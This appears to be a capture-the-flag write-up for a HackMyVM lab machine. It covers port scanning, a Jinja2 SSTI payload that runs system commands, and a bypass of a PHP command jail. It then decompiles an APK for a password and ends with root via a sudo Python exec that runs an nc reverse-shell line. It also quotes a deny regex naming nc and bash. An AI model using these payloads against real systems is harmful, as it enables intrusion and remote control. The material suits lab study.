Machine can be download here.
Nmap scan ports, 4 ports open.
Anonymous login ftp, get a file named "url".
Download "url", check filetype, a ELF file.
Use "strings" cmd to check useful strings, get nothing but a hint.
Check the file in IDA, we noticed some chars, which can make a string "/sh4d0w$s".
This string is a valid url at port 5000.
The response is "No Input". Looks like we need to pass some data to it through some param. Next step is to find the param name.
Use some normal dictionary, we fail to fuzz the param name. Then we get back to port 80. There is only an index.html at port 80.
Open index.html, we see some strange numbers and words.
Under the hint of the author, this is "min_len max_len word_pattern" to generate a dic.
Use the dic to fuzz the param name.
Directly visit the url, it just echo back the string we input.
In fact, it'a SSTI vulnerability.
Because nmap has found port 5000 is "Werkzeug/1.0.1 Python/3.7.3",so we can google SSTI POC code for python server. For example, https://www.programmersought.com/article/91565232044/.
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
Now we can run system command.
Modify the code, and get reverse shell.
In /home, we found two users, "irida" and "kori". In kori's home folder, there is a jail.php.
<?php array_shift($_SERVER['argv']); $var = implode(" ", $_SERVER['argv']); if($var == null) die("Orasis Jail, argument missing\n"); function filter($var) { if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) { return false; } return true; } if(filter($var)) { $result = exec($var); echo "$result\n"; echo "Command executed"; } else { echo "Restricted characters has been used"; } echo "\n"; ?>
Sudo -l for www-data.
Although jail.php filter some keywords, we can still use "dash" to get a reverse shell and escalate to user kori.
Sudo -l for kori, we get an apk file from user irida's home folder.
Download irida.apk, unzip it, then use d2j-dex2jar to get "classes-dex2jar.jar".
Use jd-gui to check to pseudo code. Search keyword "irida" (the username), we came to com.alienum.irida.data.
Follow the order of the string builder, and read the hint of the author at HackMyVm-->Palique, we can get the password of user irida.
Now we can ssh login as user irida.
Sudo -l shows we can run a python file at /root folder.
Run the file, input some string, we get error, and one line of the source code.
Look like "name" var only accept hex format data. We convert "/bin/bash" to hex format.
Run oras.py again, then get error again. But this time get another line of source code, which is the key.
The python file use "exec" to run python functions. The reverse python code is following.
__import__( 'os' ).system('nc 192.168.56.150 1234 -e /bin/sh')
Convert it to hex format.
At last, get reverse shell.